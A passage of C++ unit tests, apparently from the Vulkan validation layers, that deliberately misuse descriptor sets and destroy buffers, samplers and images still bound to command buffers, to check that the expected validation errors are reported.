VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; // 1) The uniform buffer is intentionally invalid here vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBufferObj dynamic_uniform_buffer; dynamic_uniform_buffer.init(*m_device, buffCI); VkDescriptorBufferInfo buffInfo[2] = {}; buffInfo[0].buffer = dynamic_uniform_buffer.handle(); buffInfo[0].offset = 0; buffInfo[0].range = 1024; buffInfo[1].buffer = dynamic_uniform_buffer.handle(); buffInfo[1].offset = 0; buffInfo[1].range = 1024; descriptor_write.pBufferInfo = buffInfo; descriptor_write.descriptorCount = 2; // 2) The stateFlags don't match between the first and second descriptor m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 3) The second descriptor has a null_ptr pImmutableSamplers and the third descriptor contains an immutable sampler descriptor_write.dstBinding = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; // Make pImageInfo index non-null to avoid complaints of it missing VkDescriptorImageInfo imageInfo = {}; imageInfo.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; descriptor_write.pImageInfo = &imageInfo; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 4) That sampled image descriptors have required layouts -- create images to update the descriptor with VkImageObj image(m_device); const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; image.Init(32, 32, 1, tex_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); // Attmept write with incorrect layout for sampled descriptor imageInfo.sampler = VK_NULL_HANDLE; imageInfo.imageView = image.targetView(tex_format); imageInfo.imageLayout = VK_IMAGE_LAYOUT_UNDEFINED; descriptor_write.dstBinding = 3; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-01403"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // 5) Attempt to update an immutable sampler descriptor_write.dstBinding = 2; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02752"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, WriteDescriptorSetConsecutiveUpdates) { TEST_DESCRIPTION( "Verifies that updates rolling over to next descriptor work correctly by destroying buffer from consecutive update known " "to be used in descriptor set and verifying that error is flagged."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 2, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); uint32_t qfi = 0; VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; bci.size = 2048; bci.queueFamilyIndexCount = 1; bci.pQueueFamilyIndices = &qfi; VkBufferObj buffer0; buffer0.init(*m_device, bci); CreatePipelineHelper pipe(*this); { // Scope 2nd buffer to cause early destruction VkBufferObj buffer1; bci.size = 1024; buffer1.init(*m_device, bci); VkDescriptorBufferInfo buffer_info[3] = {}; buffer_info[0].buffer = buffer0.handle(); buffer_info[0].offset = 0; buffer_info[0].range = 1024; buffer_info[1].buffer = buffer0.handle(); buffer_info[1].offset = 1024; buffer_info[1].range = 1024; buffer_info[2].buffer = buffer1.handle(); buffer_info[2].offset = 0; buffer_info[2].range = 1024; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; // descriptor_set; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 3; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.pBufferInfo = buffer_info; // Update descriptor vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO that uses the uniform buffers char const *fsSource = "#version 450\n" "\n" "layout(location=0) out vec4 x;\n" "layout(set=0) layout(binding=0) uniform foo { int x; int y; } bar;\n" "layout(set=0) layout(binding=1) uniform blah { int x; } duh;\n" "void main(){\n" " x = vec4(duh.x, bar.y, bar.x, 1);\n" "}\n"; VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); pipe.InitInfo(); pipe.shader_stages_ = {pipe.vs_->GetStageCreateInfo(), fs.GetStageCreateInfo()}; const VkDynamicState dyn_states[] = {VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR}; VkPipelineDynamicStateCreateInfo dyn_state_ci = {}; dyn_state_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_DYNAMIC_STATE_CREATE_INFO; dyn_state_ci.dynamicStateCount = size(dyn_states); dyn_state_ci.pDynamicStates = dyn_states; pipe.dyn_state_ci_ = dyn_state_ci; pipe.InitState(); pipe.pipeline_layout_ = VkPipelineLayoutObj(m_device, {&descriptor_set.layout_}); pipe.CreateGraphicsPipeline(); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_layout_.handle(), 0, 1, &descriptor_set.set_, 0, nullptr); VkViewport viewport = {0, 0, 16, 16, 0, 1}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); vk::CmdDraw(m_commandBuffer->handle(), 3, 1, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_commandBuffer->end(); } // buffer2 just went out of scope and was destroyed along with its memory m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkBuffer"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDeviceMemory"); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidCmdBufferDescriptorSetBufferDestroyed) { TEST_DESCRIPTION( "Attempt to draw with a command buffer that is invalid due to a bound descriptor set with a buffer dependency being " "destroyed."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); CreatePipelineHelper pipe(*this); { // Create a buffer to update the descriptor with uint32_t qfi = 0; VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buffCI.queueFamilyIndexCount = 1; buffCI.pQueueFamilyIndices = &qfi; VkBufferObj buffer; buffer.init(*m_device, buffCI); // Create PSO to be used for draw-time errors below char const *fsSource = "#version 450\n" "\n" "layout(location=0) out vec4 x;\n" "layout(set=0) layout(binding=0) uniform foo { int x; int y; } bar;\n" "void main(){\n" " x = vec4(bar.y);\n" "}\n"; VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); pipe.InitInfo(); pipe.shader_stages_ = {pipe.vs_->GetStageCreateInfo(), fs.GetStageCreateInfo()}; const VkDynamicState dyn_states[] = {VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR}; VkPipelineDynamicStateCreateInfo dyn_state_ci = {}; dyn_state_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_DYNAMIC_STATE_CREATE_INFO; dyn_state_ci.dynamicStateCount = size(dyn_states); dyn_state_ci.pDynamicStates = dyn_states; pipe.dyn_state_ci_ = dyn_state_ci; pipe.InitState(); pipe.CreateGraphicsPipeline(); // Correctly update descriptor to avoid "NOT_UPDATED" error pipe.descriptor_set_->WriteDescriptorBufferInfo(0, buffer.handle(), 1024); pipe.descriptor_set_->UpdateDescriptorSets(); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.pipeline_layout_.handle(), 0, 1, &pipe.descriptor_set_->set_, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &m_viewports[0]); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &m_scissors[0]); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } // Destroy buffer should invalidate the cmd buffer, causing error on submit // Attempt to submit cmd buffer VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // Invalid VkBuffe m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffe"); // Invalid VkDeviceMemory m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " that is invalid because bound "); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidCmdBufferDescriptorSetImageSamplerDestroyed) { TEST_DESCRIPTION( "Attempt to draw with a command buffer that is invalid due to a bound descriptor sets with a combined image sampler having " "their image, sampler, and descriptor set each respectively destroyed and then attempting to submit associated cmd " "buffers. Attempt to destroy a DescriptorSet that is in use."); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = VK_DESCRIPTOR_POOL_CREATE_FREE_DESCRIPTOR_SET_BIT; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; VkResult err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout(m_device, {dsl_binding}); VkDescriptorSet descriptorSet; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 1; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = &ds_layout.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptorSet); ASSERT_VK_SUCCESS(err); const VkPipelineLayoutObj pipeline_layout(m_device, {&ds_layout}); // Create images to update the descriptor with VkImage image; VkImage image2; const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; const int32_t tex_width = 32; const int32_t tex_height = 32; VkImageCreateInfo image_create_info = {}; image_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO; image_create_info.pNext = NULL; image_create_info.imageType = VK_IMAGE_TYPE_2D; image_create_info.format = tex_format; image_create_info.extent.width = tex_width; image_create_info.extent.height = tex_height; image_create_info.extent.depth = 1; image_create_info.mipLevels = 1; image_create_info.arrayLayers = 1; image_create_info.samples = VK_SAMPLE_COUNT_1_BIT; image_create_info.tiling = VK_IMAGE_TILING_OPTIMAL; image_create_info.usage = VK_IMAGE_USAGE_SAMPLED_BIT; image_create_info.flags = 0; err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image); ASSERT_VK_SUCCESS(err); err = vk::CreateImage(m_device->device(), &image_create_info, NULL, &image2); ASSERT_VK_SUCCESS(err); VkMemoryRequirements memory_reqs; VkDeviceMemory image_memory; bool pass; VkMemoryAllocateInfo memory_info = {}; memory_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; memory_info.pNext = NULL; memory_info.allocationSize = 0; memory_info.memoryTypeIndex = 0; vk::GetImageMemoryRequirements(m_device->device(), image, &memory_reqs); // Allocate enough memory for both images VkDeviceSize align_mod = memory_reqs.size % memory_reqs.alignment; VkDeviceSize aligned_size = ((align_mod == 0) ? memory_reqs.size : (memory_reqs.size + memory_reqs.alignment - align_mod)); memory_info.allocationSize = aligned_size * 2; pass = m_device->phy().set_memory_type(memory_reqs.memoryTypeBits, &memory_info, 0); ASSERT_TRUE(pass); err = vk::AllocateMemory(m_device->device(), &memory_info, NULL, &image_memory); ASSERT_VK_SUCCESS(err); err = vk::BindImageMemory(m_device->device(), image, image_memory, 0); ASSERT_VK_SUCCESS(err); // Bind second image to memory right after first image err = vk::BindImageMemory(m_device->device(), image2, image_memory, aligned_size); ASSERT_VK_SUCCESS(err); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image; image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView tmp_view; // First test deletes this view VkImageView view; VkImageView view2; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &tmp_view); ASSERT_VK_SUCCESS(err); err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); image_view_create_info.image = image2; err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view2); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkSampler sampler2; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler2); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler; img_info.imageView = tmp_view; img_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptorSet; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER; descriptor_write.pImageInfo = &img_info; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Create PSO to be used for draw-time errors below char const *fsSource = "#version 450\n" "\n" "layout(set=0, binding=0) uniform sampler2D s;\n" "layout(location=0) out vec4 x;\n" "void main(){\n" " x = texture(s, vec2(1));\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipeline_layout.handle(), renderPass()); // First error case is destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); // Transit image layout from VK_IMAGE_LAYOUT_UNDEFINED into VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL VkImageMemoryBarrier barrier = {}; barrier.sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER; barrier.oldLayout = VK_IMAGE_LAYOUT_UNDEFINED; barrier.newLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; barrier.srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; barrier.dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED; barrier.image = image; barrier.srcAccessMask = 0; barrier.dstAccessMask = VK_ACCESS_SHADER_READ_BIT; barrier.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; barrier.subresourceRange.baseMipLevel = 0; barrier.subresourceRange.levelCount = 1; barrier.subresourceRange.baseArrayLayer = 0; barrier.subresourceRange.layerCount = 1; vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // This first submit should be successful vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); vk::QueueWaitIdle(m_device->m_queue); // Now destroy imageview and reset cmdBuffer vk::DestroyImageView(m_device->device(), tmp_view, NULL); m_commandBuffer->reset(0); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " that is invalid or has been destroyed."); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Re-update descriptor with new view img_info.imageView = view; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); // Now test destroying sampler prior to cmd buffer submission m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Destroy sampler invalidates the cmd buffer, causing error on submit vk::DestroySampler(m_device->device(), sampler, NULL); // Attempt to submit cmd buffer m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkSampler"); submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Now re-update descriptor with valid sampler and delete image img_info.sampler = sampler2; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); VkCommandBufferBeginInfo info = {}; info.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; info.flags = VK_COMMAND_BUFFER_USAGE_SIMULTANEOUS_USE_BIT; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkImage"); m_commandBuffer->begin(&info); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // Destroy image invalidates the cmd buffer, causing error on submit vk::DestroyImage(m_device->device(), image, NULL); // Attempt to submit cmd buffer submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Now update descriptor to be valid, but then free descriptor img_info.imageView = view2; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_commandBuffer->begin(&info); // Transit image2 layout from VK_IMAGE_LAYOUT_UNDEFINED into VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL barrier.image = image2; vk::CmdPipelineBarrier(m_commandBuffer->handle(), VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, VK_PIPELINE_STAGE_ALL_COMMANDS_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &descriptorSet, 0, NULL); vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); // Immediately try to destroy the descriptor set in the active command buffer - failure expected m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-pDescriptorSets-00309"); vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); m_errorMonitor->VerifyFound(); // Try again once the queue is idle - should succeed w/o error // TODO - though the particular error above doesn't re-occur, there are other 'unexpecteds' still to clean up vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->SetUnexpectedError( "pDescriptorSets must be a valid pointer to an array of descriptorSetCount VkDescriptorSet handles, each element of which " "must either be a valid handle or VK_NULL_HANDLE"); m_errorMonitor->SetUnexpectedError("Unable to remove DescriptorSet obj"); vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); // Attempt to submit cmd buffer containing the freed descriptor set submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDescriptorSet"); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); // Cleanup vk::FreeMemory(m_device->device(), image_memory, NULL); vk::DestroySampler(m_device->device(), sampler2, NULL); vk::DestroyImage(m_device->device(), image2, NULL); vk::DestroyImageView(m_device->device(), view, NULL); vk::DestroyImageView(m_device->device(), view2, NULL); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, InvalidDescriptorSetSamplerDestroyed) { TEST_DESCRIPTION("Attempt to draw with a bound descriptor sets with a combined image sampler where sampler has been deleted."); ASSERT_NO_FATAL_FAILURE(Init(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); // Create images to update the descriptor with VkImageObj image(m_device); const VkFormat tex_format = VK_FORMAT_B8G8R8A8_UNORM; image.Init(32, 32, 1, tex_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo image_view_create_info = {}; image_view_create_info.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_create_info.image = image.handle(); image_view_create_info.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_create_info.format = tex_format; image_view_create_info.subresourceRange.layerCount = 1; image_view_create_info.subresourceRange.baseMipLevel = 0; image_view_create_info.subresourceRange.levelCount = 1; image_view_create_info.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkImageView view; VkResult err = vk::CreateImageView(m_device->device(), &image_view_create_info, NULL, &view); ASSERT_VK_SUCCESS(err); // Create Samplers VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); VkSampler sampler1; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler1); ASSERT_VK_SUCCESS(err); // Update descriptor with image and sampler VkDescriptorImageInfo img_info = {}; img_info.sampler = sampler; img_info.imageView = view; img_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; VkDescriptorImageInfo img_info1 = img_info; img_info1.sampler = sampler1; VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, 